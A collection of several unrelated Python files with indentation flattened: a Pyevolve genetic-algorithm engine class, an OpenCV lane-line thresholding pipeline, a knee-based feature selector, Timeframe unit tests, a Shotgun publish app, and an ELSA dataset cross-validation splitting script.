self.GPMode = bool_value
# -----------------------------------------------------------------
def getGPMode(self):
""" Get the Genetic Programming mode of the GA Engine
:rtype: True or False
"""
return self.GPMode
# -----------------------------------------------------------------
def __call__(self, *args, **kwargs):
""" A method to implement a callable object
Example:
>>> ga_engine(freq_stats=10)
.. versionadded:: 0.6
The callable method.
"""
if kwargs.get("freq_stats", None):
return self.evolve(kwargs.get("freq_stats"))
else: return self.evolve()
# -----------------------------------------------------------------
def setParams(self, **args):
""" Set the internal params
Example:
>>> ga.setParams(gp_terminals=['x', 'y'])
:param args: params to save
..versionaddd:: 0.6
Added the *setParams* method.
"""
self.internalParams.update(args)
# -----------------------------------------------------------------
def getParam(self, key, nvl=None):
""" Gets an internal parameter
Example:
>>> ga.getParam("gp_terminals")
['x', 'y']
:param key: the key of param
:param nvl: if the key doesn't exist, the nvl will be returned
..versionaddd:: 0.6
Added the *getParam* method.
"""
return self.internalParams.get(key, nvl)
# -----------------------------------------------------------------
def setInteractiveGeneration(self, generation):
""" Sets the generation in which the GA must enter in the
Interactive Mode
:param generation: the generation number, use "-1" to disable
.. versionadded::0.6
The *setInteractiveGeneration* method.
"""
if generation < -1:
utils.raiseException("Generation must be >= -1", ValueError)
self.interactiveGen = generation
# -----------------------------------------------------------------
def getInteractiveGeneration(self):
""" returns the generation in which the GA must enter in the
Interactive Mode
:rtype: the generation number or -1 if not set
.. versionadded::0.6
The *getInteractiveGeneration* method.
"""
return self.interactiveGen
# -----------------------------------------------------------------
def setElitismReplacement(self, numreplace):
""" Set the number of best individuals to copy to the next generation on the elitism
:param numreplace: the number of individuals
.. versionadded:: 0.6
The *setElitismReplacement* method.
"""
if numreplace < 1:
utils.raiseException("Replacement number must be >= 1", ValueError)
self.nElitismReplacement = numreplace
# -----------------------------------------------------------------
def setInteractiveMode(self, flag=True):
""" Enable/disable the interactive mode
:param flag: True or False
.. versionadded: 0.6
The *setInteractiveMode* method.
"""
if type(flag) != BooleanType:
utils.raiseException("Interactive Mode option must be True or False", TypeError)
self.interactiveMode = flag
# -----------------------------------------------------------------
def __repr__(self):
""" The string representation of the GA Engine """
minimax_type = constants.minimaxType.keys()[constants.minimaxType.values().index(self.minimax)]
ret = "- GSimpleGA\n"
ret += "\tGP Mode:\t\t %s\n" % self.getGPMode()
ret += "\tPopulation Size:\t %d\n" % self.internalPop.popSize
ret += "\tGenerations:\t\t %d\n" % self.nGenerations
ret += "\tCurrent Generation:\t %d\n" % self.currentGeneration
ret += "\tMutation Rate:\t\t %.2f\n" % self.pMutation
ret += "\tCrossover Rate:\t\t %.2f\n" % self.pCrossover
ret += "\tMinimax Type:\t\t %s\n" % minimax_type.capitalize()
ret += "\tElitism:\t\t %s\n" % self.elitism
ret += "\tElitism Replacement:\t %d\n" % self.nElitismReplacement
ret += "\tDB Adapter:\t\t %s\n" % self.dbAdapter
for slot in self.allSlots:
ret += "\t" + slot.__repr__()
ret += "\n"
# Return the string
return ret
# -----------------------------------------------------------------
def setMultiProcessing(self, flag=True, full_copy=False, max_processes=None):
""" Sets the flag to enable/disable the use of python multiprocessing module.
Use this option when you have more than one core on your CPU and when your
evaluation function is very slow.
Pyevolve will automaticly check if your Python version has **multiprocessing**
support and if you have more than one single CPU core. If you don't have support
or have just only one core, Pyevolve will not use the **multiprocessing**
feature.
Pyevolve uses the **multiprocessing** to execute the evaluation function over
the individuals, so the use of this feature will make sense if you have a
truly slow evaluation function (which is commom in GAs).
The parameter "full_copy" defines where the individual data should be copied back
after the evaluation or not. This parameter is useful when you change the
individual in the evaluation function.
:param flag: True (default) or False
:param full_copy: True or False (default)
:param max_processes: None (default) or an integer value
.. warning:: Use this option only when your evaluation function is slow, so you'll
get a good tradeoff between the process communication speed and the
parallel evaluation. The use of the **multiprocessing** doesn't means
always a better performance.
.. note:: To enable the multiprocessing option, you **MUST** add the *__main__* check
on your application, otherwise, it will result in errors. See more on the
`Python Docs <http://docs.python.org/library/multiprocessing.html#multiprocessing-programming>`__
site.
.. versionadded:: 0.6
The `setMultiProcessing` method.
"""
if type(flag) != BooleanType:
utils.raiseException("Multiprocessing option must be True or False", TypeError)
if type(full_copy) != BooleanType:
utils.raiseException("Multiprocessing 'full_copy' option must be True or False", TypeError)
self.internalPop.setMultiProcessing(flag, full_copy, max_processes)
# -----------------------------------------------------------------
def setMigrationAdapter(self, migration_adapter=None):
"""
Sets the Migration Adapter
.. versionadded:: 0.6
The `setMigrationAdapter` method.
"""
self.migrationAdapter = migration_adapter
if self.migrationAdapter is not None:
self.migrationAdapter.setGAEngine(self)
# -----------------------------------------------------------------
def setDBAdapter(self, dbadapter=None):
"""
Sets the DB Adapter of the GA Engine
:param dbadapter: one of the :mod:`DBAdapters` classes instance
.. warning:: the use the of a DB Adapter can reduce the speed performance of the
Genetic Algorithm.
"""
if (dbadapter is not None) and (not isinstance(dbadapter, DBBaseAdapter)):
utils.raiseException("The DB Adapter must be a DBBaseAdapter subclass", TypeError)
self.dbAdapter = dbadapter
# -----------------------------------------------------------------
def setPopulationSize(self, size):
"""
Sets the population size, calls setPopulationSize() of GPopulation
:param size: the population size
.. note:: the population size must be >= 2
"""
if size < 2:
utils.raiseException("population size must be >= 2", ValueError)
self.internalPop.setPopulationSize(size)
# -----------------------------------------------------------------
def setSortType(self, sort_type):
"""
Sets the sort type, constants.sortType["raw"]/constants.sortType["scaled"]
Example:
>>> ga_engine.setSortType(constants.sortType["scaled"])
:param sort_type: the Sort Type
"""
if sort_type not in constants.sortType.values():
utils.raiseException("sort type must be a constants.sortType type", TypeError)
self.internalPop.sortType = sort_type
# -----------------------------------------------------------------
def setMutationRate(self, rate):
"""
Sets the mutation rate, between 0.0 and 1.0
:param rate: the rate, between 0.0 and 1.0
"""
if (rate > 1.0) or (rate < 0.0):
utils.raiseException("Mutation rate must be >= 0.0 and <= 1.0", ValueError)
self.pMutation = rate
# -----------------------------------------------------------------
def setCrossoverRate(self, rate):
"""
Sets the crossover rate, between 0.0 and 1.0
:param rate: the rate, between 0.0 and 1.0
"""
if (rate > 1.0) or (rate < 0.0):
utils.raiseException("Crossover rate must be >= 0.0 and <= 1.0", ValueError)
self.pCrossover = rate
# -----------------------------------------------------------------
def setGenerations(self, num_gens):
"""
Sets the number of generations to evolve
:param num_gens: the number of generations
"""
if num_gens < 1:
utils.raiseException("Number of generations must be >= 1", ValueError)
self.nGenerations = num_gens
# -----------------------------------------------------------------
def getGenerations(self):
"""
Return the number of generations to evolve
:rtype: the number of generations
.. versionadded:: 0.6
Added the *getGenerations* method
"""
return self.nGenerations
# -----------------------------------------------------------------
def getMinimax(self):
""" Gets the minimize/maximize mode
:rtype: the constants.minimaxType type
"""
return self.minimax
# -----------------------------------------------------------------
def setMinimax(self, mtype):
""" Sets the minimize/maximize mode, use constants.minimaxType
:param mtype: the minimax mode, from constants.minimaxType
"""
if mtype not in constants.minimaxType.values():
utils.raiseException("Minimax must be maximize or minimize", TypeError)
self.minimax = mtype
# -----------------------------------------------------------------
def getCurrentGeneration(self):
""" Gets the current generation
:rtype: the current generation
"""
return self.currentGeneration
# -----------------------------------------------------------------
def setElitism(self, flag):
""" Sets the elitism option, True or False
:param flag: True or False
"""
if type(flag) != BooleanType:
utils.raiseException("Elitism option must be True or False", TypeError)
self.elitism = flag
# -----------------------------------------------------------------
def getDBAdapter(self):
""" Gets the DB Adapter of the GA Engine
:rtype: a instance from one of the :mod:`DBAdapters` classes
"""
return self.dbAdapter
# -----------------------------------------------------------------
def setMaxTime(self, seconds):
""" Sets the maximun evolve time of the GA Engine
:param seconds: maximum time in seconds
"""
self.max_time = seconds
# -----------------------------------------------------------------
def getMaxTime(self):
""" Get the maximun evolve time of the GA Engine
:rtype: True or False
"""
return self.max_time
# -----------------------------------------------------------------
def bestIndividual(self):
""" Returns the population best individual
:rtype: the best individual
"""
return self.internalPop.bestRaw()
# -----------------------------------------------------------------
def worstIndividual(self):
""" Returns the population worst individual
:rtype: the best individual
"""
return self.internalPop.worstRaw()
# -----------------------------------------------------------------
def __gp_catch_functions(self, prefix):
""" Internally used to catch functions with some specific prefix
as non-terminals of the GP core """
import __main__ as mod_main
function_set = {}
main_dict = mod_main.__dict__
for obj, addr in main_dict.items():
if obj[0:len(prefix)] == prefix:
try:
op_len = addr.func_code.co_argcount
except:
continue
function_set[obj] = op_len
if len(function_set) <= 0:
utils.raiseException("No function set found using function prefix '%s' !" % prefix, ValueError)
self.setParams(gp_function_set=function_set)
# -----------------------------------------------------------------
def initialize(self):
"""
This function initializes the GA Engine. Create and initialize the first population
"""
# Inform the user
log.info("Initializing the GA engine ...")
# Keep track of the time passed
self.time_init = time()
# Create the first population
self.internalPop.create(minimax=self.minimax)
# Initialize the population (initializes all individuals of the population)
self.internalPop.initialize(ga_engine=self)
# -----------------------------------------------------------------
def set_scores(self, scores, check=None):
"""
This function ...
:param scores:
:param check:
:return:
"""
# Set the scores for the initial population
if self.is_initial_generation: self.set_scores_for_population(self.internalPop, scores, check)
# Set the scores for the new population
else:
# Set scores
self.set_scores_for_population(self.new_population, scores, check)
# Replace
if self.new_population is not None: self.replace_internal_population()
# Increment the current generation number
self.currentGeneration += 1
# Sort the internal population
self.internalPop.sort()
# Set new pop to None
self.new_population = None
# -----------------------------------------------------------------
def set_scores_for_population(self, population, scores, check=None):
"""
This function ...
:param population:
:param scores:
:param check:
:return:
"""
index = 0
for individual in population:
if check is not None:
# Get the parametr values for this individual
parameter_a = individual.genomeList[0]
parameter_b = individual.genomeList[1]
parameter_a_check = check["Parameter a"][index]
parameter_b_check = check["Parameter b"][index]
rel_diff_a = abs((parameter_a - parameter_a_check) / parameter_a)
rel_diff_b = abs((parameter_b - parameter_b_check) / parameter_b)
assert np.isclose(parameter_a, parameter_a_check, rtol=1e-11), rel_diff_a
assert np.isclose(parameter_b, parameter_b_check, rtol=1e-11), rel_diff_b
# Set the score
individual.score = scores[index]
# Increment the index
index += 1
# -----------------------------------------------------------------
def get_population(self):
""" Return the internal population of GA Engine
:rtype: the population (:class:`GPopulation.GPopulation`)
"""
return self.internalPop
# -----------------------------------------------------------------
def getStatistics(self):
"""
Gets the Statistics class instance of current generation
:rtype: the statistics instance (:class:`Statistics.Statistics`)
"""
return self.internalPop.getStatistics()
# -----------------------------------------------------------------
def generate_new_population(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Creating generation " + str(self.currentGeneration) + " ...")
# Clone the current internal population
newPop = GPopulation(self.internalPop)
log.debug("Population was cloned.")
size_iterate = len(self.internalPop)
# Odd population size
if size_iterate % 2 != 0:
size_iterate -= 1
crossover_empty = self.select(popID=self.currentGeneration).crossover.isEmpty()
for i in xrange(0, size_iterate, 2):
genomeMom = self.select(popID=self.currentGeneration)
genomeDad = self.select(popID=self.currentGeneration)
if not crossover_empty and self.pCrossover >= 1.0:
for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=2):
(sister, brother) = it
else:
if not crossover_empty and utils.randomFlipCoin(self.pCrossover):
for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=2):
(sister, brother) = it
else:
sister = genomeMom.clone()
brother = genomeDad.clone()
sister.mutate(pmut=self.pMutation, ga_engine=self)
brother.mutate(pmut=self.pMutation, ga_engine=self)
newPop.internalPop.append(sister)
newPop.internalPop.append(brother)
if len(self.internalPop) % 2 != 0:
genomeMom = self.select(popID=self.currentGeneration)
genomeDad = self.select(popID=self.currentGeneration)
if utils.randomFlipCoin(self.pCrossover):
for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=1):
(sister, brother) = it
else:
sister = prng.choice([genomeMom, genomeDad])
sister = sister.clone()
sister.mutate(pmut=self.pMutation, ga_engine=self)
newPop.internalPop.append(sister)
# Return the new population
#return newPop
# NEW
self.new_population = newPop
# -----------------------------------------------------------------
def step(self):
"""
This function performs one step in the evolution, i.e. one generation
"""
# Inform the user
log.info("Performing step in the evolutionary process ...")
# Generate the new population ## NEW
self.generate_new_population()
# Evaluate
print(self.generation_description)
self.new_population.evaluate()
# Replace population
self.replace_internal_population()
# Sort the population
self.internalPop.sort()
# Set new population to None
self.new_population = None
# Inform the user
#log.success("The generation %d was finished.", self.currentGeneration)
# Increment the current generation number
self.currentGeneration += 1
if self.max_time:
total_time = time() - self.time_init
if total_time > self.max_time:
return True
return self.currentGeneration == self.nGenerations
# -----------------------------------------------------------------
def replace_internal_population(self):
"""
This function ...
:return:
"""
# Elitism:
if self.elitism: self.do_elitism(self.new_population)
# Set the new population as the internal population and sort it
self.internalPop = self.new_population
# -----------------------------------------------------------------
def do_elitism(self, new_population):
"""
This function ...
:param new_population:
:return:
"""
# Elitism concept has different meanings for metaheuristic and particular for GA. In general, elitism
# is related with memory: "remember the best solution found" (kind of greedying). In the most traditional way,
# for evolutionary algorithms (GA, EA, DE...), elitism implies the best solution found is used for to build the
# next generation. Particularly, for GA it means keeping the best individual found intact for next generation.
# In GA, there is something like a proof for multiobjective optimization (villalobos, coello and hernandez, 2005)
# that linked convergence and elitism which is a kind of cool stuff.
#
# Elitism involves copying a small proportion of the fittest candidates, unchanged, into the next generation.
# This can sometimes have a dramatic impact on performance by ensuring that the EA does not waste time
# re-discovering previously discarded partial solutions. Candidate solutions that are preserved unchanged
# through elitism remain eligible for selection as parents when breeding the remainder of the next generation.
log.debug("Doing elitism ...")
if self.getMinimax() == constants.minimaxType["maximize"]:
for i in xrange(self.nElitismReplacement):
##re-evaluate before being sure this is the best
# self.internalPop.bestRaw(i).evaluate() # IS THIS REALLY NECESSARY ?
if self.internalPop.bestRaw(i).score > new_population.bestRaw(i).score:
new_population[len(new_population) - 1 - i] = self.internalPop.bestRaw(i)
elif self.getMinimax() == constants.minimaxType["minimize"]:
for i in xrange(self.nElitismReplacement):
##re-evaluate before being sure this is the best
# self.internalPop.bestRaw(i).evaluate() # IS THIS REALLY NECESSARY ?
if self.internalPop.bestRaw(i).score < new_population.bestRaw(i).score:
new_population[len(new_population) - 1 - i] = self.internalPop.bestRaw(i)
# -----------------------------------------------------------------
def printStats(self):
""" Print generation statistics
:rtype: the printed statistics as string
.. versionchanged:: 0.6
The return of *printStats* method.
"""
percent = self.currentGeneration * 100 / float(self.nGenerations)
message = "Gen. %d (%.2f%%):" % (self.currentGeneration, percent)
log.info(message)
print(message,)
sys_stdout.flush()
self.internalPop.statistics()
stat_ret = self.internalPop.printStats()
return message + stat_ret
# -----------------------------------------------------------------
def printTimeElapsed(self):
"""
Shows the time elapsed since the begin of evolution
"""
total_time = time() - self.time_init
print("Total time elapsed: %.3f seconds." % total_time)
return total_time
# -----------------------------------------------------------------
def dumpStatsDB(self):
"""
Dumps the current statistics to database adapter
"""
log.debug("Dumping stats to the DB Adapter")
self.internalPop.statistics()
self.dbAdapter.insert(self)
# -----------------------------------------------------------------
def evolve(self, freq_stats=0):
""" Do all the generations until the termination criteria, accepts
the freq_stats (default is 0) to dump statistics at n-generation
Example:
>>> ga_engine.evolve(freq_stats=10)
(...)
:param freq_stats: if greater than 0, the statistics will be
printed every freq_stats generation.
:rtype: returns the best individual of the evolution
.. versionadded:: 0.6
the return of the best individual
"""
# Initialize
self.initialize_evolution()
# Do the evolution loop
self.evolve_loop(freq_stats)
# Finish evolution, return best individual
return self.finish_evolution()
# -----------------------------------------------------------------
@property
def is_initial_generation(self):
"""
This function ...
:return:
"""
if self.new_population is None:
if self.currentGeneration > 0: raise RuntimeError("Inconsistent state: 'new_population' does exist but 'currentGeneration' >0")
return True
else: return False
# -----------------------------------------------------------------
@property
def generation_description(self):
"""
This function ...
:return:
"""
if self.is_initial_generation: return "Initial generation"
else: return "Generation " + str(self.currentGeneration)
# -----------------------------------------------------------------
def initialize_evolution(self):
"""
This function ...
:return:
"""
self.initialize()
# Inform the user ...
log.info("Evaluating and sorting the initial population ...")
# Evaluate and sort the internal population
self.internalPop.evaluate()
self.sort_internal_population()
# -----------------------------------------------------------------
def sort_internal_population(self):
"""
This function ...
:return:
"""
self.internalPop.sort()
# -----------------------------------------------------------------
def evolve_loop(self, freq_stats):
"""
This function ...
:return:
"""
log.debug("Starting loop over evolutionary algorithm.")
while True:
if not self.evolve_generation(freq_stats): break
# -----------------------------------------------------------------
def finish_evolution(self, silent=True):
"""
This function ...
:return:
"""
if not silent:
self.printStats()
self.printTimeElapsed()
if self.dbAdapter:
log.debug("Closing the DB Adapter")
if not (self.currentGeneration % self.dbAdapter.getStatsGenFreq() == 0):
self.dumpStatsDB()
self.dbAdapter.commitAndClose()
if self.migrationAdapter:
log.debug("Closing the Migration Adapter")
self.migrationAdapter.stop()
return self.bestIndividual()
# -----------------------------------------------------------------
def evolve_generation(self, freq_stats):
"""
This function ...
:param freq_stats:
:return:
"""
stopFlagCallback = False
stopFlagTerminationCriteria = False
if self.migrationAdapter:
log.debug("Migration adapter: exchange")
self.migrationAdapter.exchange()
self.internalPop.clearFlags()
self.internalPop.sort()
if not self.stepCallback.isEmpty():
for it in self.stepCallback.applyFunctions(self):
stopFlagCallback = it
if not self.terminationCriteria.isEmpty():
for it in self.terminationCriteria.applyFunctions(self):
stopFlagTerminationCriteria = it
if freq_stats:
if (self.currentGeneration % freq_stats == 0) or (self.getCurrentGeneration() == 0):
self.printStats()
if self.dbAdapter:
if self.currentGeneration % self.dbAdapter.getStatsGenFreq() == 0:
self.dumpStatsDB()
if stopFlagTerminationCriteria:
log.debug("Evolution stopped by the Termination Criteria !")
if freq_stats:
print("\n\tEvolution stopped by Termination Criteria function !\n")
return False
if stopFlagCallback:
log.debug("Evolution stopped by Step Callback function !")
if freq_stats:
print("\n\tEvolution stopped by Step Callback function !\n")
return False
if self.step(): return False
return True
# -----------------------------------------------------------------
def select(self, **args):
"""
Select one individual from population
:param args: this parameters will be sent to the selector
"""
for it in self.selector.applyFunctions(self.internalPop, **args):
return it
# -----------------------------------------------------------------
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
image = mpimg.imread('bridge_shadow.jpg')
# Edit this function to create your own pipeline.
def pipeline(img, s_thresh=(170, 255), sx_thresh=(20, 100)):
img = np.copy(img)
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
# Grayscale image
# NOTE: we already saw that standard grayscaling lost color information for the lane lines
# Explore gradients in other colors spaces / color channels to see what might work better
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Sobel x
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
thresh_min = 20
thresh_max = 100
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
# Threshold color channel
s_thresh_min = 170
s_thresh_max = 255
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
return combined_binary
result = pipeline(image)
# Plot the result
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))
f.tight_layout()
ax1.imshow(image)
ax1.set_title('Original Image', fontsize=40)
ax2.imshow(result)
ax2.set_title('Pipeline Result', fontsize=40)
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
|
from typing import NamedTuple
import numpy as np
from kneed import KneeLocator
FeaturesSelection = NamedTuple(
"FeaturesSelection",
[
("score", np.ndarray),
("index", np.ndarray),
("selection", np.ndarray),
("threshold", float),
],
)
def _gradient(values: np.ndarray, order: int = 1) -> np.ndarray:
result = values
for _ in range(order):
result = np.gradient(result)
return result
def _plateau_point(sorted_scores) -> int:
gradient = np.abs(_gradient(sorted_scores))
is_plateau = gradient <= np.percentile(gradient, 1)
plateau_points = np.nonzero(is_plateau)[0]
return int(np.median(plateau_points))
def _knee_point(decreasing_segment: np.ndarray) -> int:
locator = KneeLocator(
x=np.arange(decreasing_segment.size, dtype=int),
y=decreasing_segment,
S=1.0,
curve="convex",
direction="decreasing",
)
assert locator.knee is not None
return locator.knee
def select_features(feature_scores) -> FeaturesSelection:
feature_scores = feature_scores.ravel()
index = np.argsort(-feature_scores)
score = feature_scores[index]
plateau_point = _plateau_point(score)
concave_up_segment = score[:plateau_point]
knee_location = _knee_point(concave_up_segment)
threshold = score[knee_location]
selection = feature_scores >= threshold
return FeaturesSelection(score, index, selection, threshold)
|
import unittest
import numpy as np
import pandas as pd
from disarm_gears.frames import Timeframe
# Inputs
start_date = '2000-06-15'
end_date = '2010-06-20'
class TimeframeTests(unittest.TestCase):
def test_inputs(self):
# Check bad inputs
self.assertRaises(AssertionError, Timeframe, start=start_date, length=0)
self.assertRaises(AssertionError, Timeframe, start=start_date, length=3, step=.5)
self.assertRaises(ValueError, Timeframe, start=start_date, length=3, step=1, by='x')
self.assertRaises(AssertionError, Timeframe, start=None, end=end_date, length=0)
self.assertRaises(AssertionError, Timeframe, start=None, end=end_date, length=3, step=.5)
self.assertRaises(ValueError, Timeframe, start=None, end=end_date, length=3, step=1, by='x')
def test_outputs(self):
# By day, length = 1
tf_00 = Timeframe(start=start_date, length=1, by='day')
self.assertIsInstance(tf_00.knots_info, pd.DataFrame)
self.assertEqual(tf_00.knots_info.shape[0], 1)
#self.assertEqual(tf_00.knots_info.shape[1], 2)#TODO three columns if we add tag
self.assertEqual(tf_00.start, tf_00.end)
tf_01 = Timeframe(start=None, end=end_date, length=1, by='day')
self.assertIsInstance(tf_01.knots_info, pd.DataFrame)
self.assertEqual(tf_01.knots_info.shape[0], 1)
#self.assertEqual(tf_01.knots_info.shape[1], 2)
self.assertEqual(tf_01.start, tf_01.end)
# By day, length = 2
tf_1 = Timeframe(start=start_date, length=2, by='day')
self.assertIsInstance(tf_1.knots_info, pd.DataFrame)
self.assertEqual(tf_1.knots_info.shape[0], 2)
#self.assertEqual(tf_1.knots_info.shape[1], 2)
self.assertEqual((tf_1.end - tf_1.start).days, 1)
# By day, length = 1, step = 2
tf_2 = Timeframe(start=start_date, length=1, step=2, by='day')
self.assertIsInstance(tf_2.knots_info, pd.DataFrame)
self.assertEqual(tf_2.knots_info.shape[0], 1)
#self.assertEqual(tf_2.knots_info.shape[1], 2)
self.assertEqual((tf_2.end - tf_2.start).days, 1)
# By month
tf_30 = Timeframe(start=start_date, length=3, step=1, by='month')
self.assertEqual(tf_30.knots_info.knot[0], 0)
self.assertEqual(tf_30.knots_info.knot[2], 2)
self.assertEqual(tf_30.knots_info.shape[0], 3)
self.assertEqual(tf_30.knots_info.init_date[1], pd.to_datetime('2000-07-15'))
self.assertEqual(tf_30.end, pd.to_datetime('2000-09-14'))
tf_31 = Timeframe(start=None, end=end_date, length=3, step=1, by='month')
self.assertEqual(tf_31.knots_info.knot[0], 0)
self.assertEqual(tf_31.knots_info.knot[2], 2)
self.assertEqual(tf_31.knots_info.shape[0], 3)
# By year, step = 2
tf_4 = Timeframe(start=start_date, length=5, step=2, by='year')
self.assertIsInstance(tf_4.knots_info, pd.DataFrame)
self.assertEqual(tf_4.knots_info.shape[0], 5)
self.assertEqual(tf_4.knots_info.init_date[3], pd.to_datetime('2006-06-15'))
self.assertEqual(tf_4.end, pd.to_datetime('2010-06-14'))
# By year, step = 2, start and end non None
tf_5 = Timeframe(start=start_date, length=5, step=2, by='year', end=end_date)
self.assertIsInstance(tf_5.knots_info, pd.DataFrame)
self.assertEqual(tf_5.knots_info.shape[0], 5)
self.assertEqual(tf_5.knots_info.init_date[3], pd.to_datetime('2006-06-15'))
self.assertEqual(tf_5.end, pd.to_datetime('2010-06-14'))
# By year, step = 2, start = None
tf_6 = Timeframe(start=None, length=5, step=2, by='year', end=end_date)
self.assertIsInstance(tf_6.knots_info, pd.DataFrame)
self.assertEqual(tf_6.knots_info.shape[0], 5)
self.assertEqual(tf_6.knots_info.init_date[3], pd.to_datetime('2006-06-21'))
self.assertEqual(tf_6.start, pd.to_datetime('2000-06-21'))
self.assertEqual(tf_6.end, pd.to_datetime(end_date))
def test_which_knots(self):
tf_6 = Timeframe(start=start_date, length=10, step=7, by='day')
dates = np.array(['2000-06-22', '2000-07-12', '2000-01-01', '2002-12-31', '2000-08-23', '2000-08-24'])
ix = tf_6.which_knot(dates)
self.assertEqual(ix.size, dates.size)
self.assertIsInstance(ix, np.ndarray)
self.assertEqual(ix[0], 1)
self.assertEqual(ix[1], 3)
self.assertEqual(ix[2], -1)
self.assertEqual(ix[3], -1)
self.assertEqual(ix[4], 9)
self.assertEqual(ix[5], -1)
|
# Copyright (c) 2015 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""
Multi Publish
"""
import os
import tank
from tank import TankError
class MultiPublish(tank.platform.Application):
def init_app(self):
"""
Called as the application is being initialized
"""
tk_multi_publish = self.import_module("tk_multi_publish")
self._publish_handler = tk_multi_publish.PublishHandler(self)
# register commands:
display_name = self.get_setting("display_name")
# "Publish Render" ---> publish_render
command_name = display_name.lower().replace(" ", "_")
if command_name.endswith("..."):
command_name = command_name[:-3]
params = {
"short_name": command_name,
"title": "%s..." % display_name,
"description": "Publishing of data into Shotgun",
# dark themed icon for engines that recognize this format
"icons": {
"dark": {
"png": os.path.join(
os.path.dirname(__file__),
"resources",
"publish_menu_icon.png"
)
}
}
}
self.engine.register_command("%s..." % display_name,
self._publish_handler.show_publish_dlg,
params)
@property
def context_change_allowed(self):
"""
Specifies that context changes are allowed.
"""
return True
def destroy_app(self):
self.log_debug("Destroying tk-multi-publish")
def copy_file(self, source_path, target_path, task):
"""
Utility method to copy a file from source_path to
target_path. Uses the copy file hook specified in
the configuration
"""
self.execute_hook("hook_copy_file",
source_path=source_path,
target_path=target_path,
task=task)
def post_context_change(self, old_context, new_context):
"""
Runs after a context change has completed.
:param old_context: The sgtk.context.Context being switched from.
:param new_context: The sgtk.context.Context being switched to.
"""
self._publish_handler.rebuild_primary_output()
|
import numpy as np
import pandas as pd
import argparse
from numpy.random import RandomState
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.utils import resample
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, default = 'elsa')
args = parser.parse_args()
"""
Creates train, validation, and test sets
"""
def create_cv():
def create_data(index, full_data, deficits_val, medications_val, background_val, train = False, mean_deficits = 0, std_deficits = 0):
chosen = X[index, 0]
random_ids = dict(zip(chosen, np.random.rand(len(chosen))))
data = full_data.loc[full_data['id'].isin(chosen),['id', 'wave', 'age'] + deficits_val +
medications_val + background_val + ['death age']]
data['new ID'] = data.apply(lambda row: random_ids[int(row['id'])], axis = 1)
data = data.sort_values(by = ['new ID','wave'])
# scaling
if train:
mean_deficits = pd.Series(index = deficits_val+['height', 'bmi', 'alcohol'])
std_deficits = pd.Series(index = deficits_val+['height', 'bmi', 'alcohol'])
for d in deficits_val+['height', 'bmi', 'alcohol']:
mean_deficits[d] = data.loc[data[d]>-100,d].mean()
std_deficits[d] = data.loc[data[d]>-100,d].std()
else:
for d in deficits_val+['height', 'bmi', 'alcohol']:
data[d] = data[d].apply(lambda x: (x - mean_deficits[d])/std_deficits[d] if x > -100 else x)
data = data[['id', 'wave', 'age'] + deficits_val + medications_val + background_val + ['death age'] ]#.values
indexes = []
index_count = -1
previous_index = -100000
for i in range(len(data)):
index = data.iloc[i,0]
if(index != previous_index):
index_count += 1
data.iloc[i,0] = index_count
previous_index = index
if train:
return data, mean_deficits, std_deficits
else:
return data
ran_state = RandomState(2)
deficits = ['gait speed', 'grip dom', 'grip ndom', 'FI ADL', 'FI IADL', 'chair','leg raise', 'full tandem', 'srh', 'eye',
'hear', 'func',
'dias', 'sys', 'pulse', 'trig','crp','hdl','ldl','glucose','igf1','hgb','fib','fer', 'chol', 'wbc', 'mch', 'hba1c', 'vitd']
medications = ['BP med', 'anticoagulent med', 'chol med', 'hip/knee treat', 'lung/asthma med']
background = ['longill', 'limitact', 'effort', 'smkevr', 'smknow','height', 'bmi', 'mobility', 'country',
'alcohol', 'jointrep', 'fractures', 'sex', 'ethnicity']
if args.dataset == 'elsa':
data = pd.read_csv('../Data/ELSA_cleaned.csv')
postfix = ''
print('Splitting ELSA dataset')
elif args.dataset == 'sample':
data = pd.read_csv('../Data/sample_data.csv')
postfix = '_sample'
print('Splitting sample dataset')
else:
print('unknown dataset')
return 0
unique_indexes = data['id'].unique()
data['censored'] = data['death age'].apply(lambda x: 0 if x > 0 else 1)
censored = []
for id in unique_indexes:
censored.append(data.loc[data['id'] == id, 'censored'].unique()[0])
X = np.array([unique_indexes, censored], int).T
from sklearn.model_selection import StratifiedKFold
skf_outer = StratifiedKFold(n_splits=5, shuffle = True, random_state = 2)
skf_inner = StratifiedKFold(n_splits=5, shuffle = True, random_state = 3)
for i, (full_train_index, test_index) in enumerate(skf_outer.split(X[:,0], X[:,1])):
_, mean_deficits, std_deficits = create_data(np.arange(0,len(X[full_train_index,0]),dtype=int), data, deficits, medications, background, train=True)
mean_deficits.to_csv('../Data/mean_deficits%s.txt'%postfix)
std_deficits.to_csv('../Data/std_deficits%s.txt'%postfix)
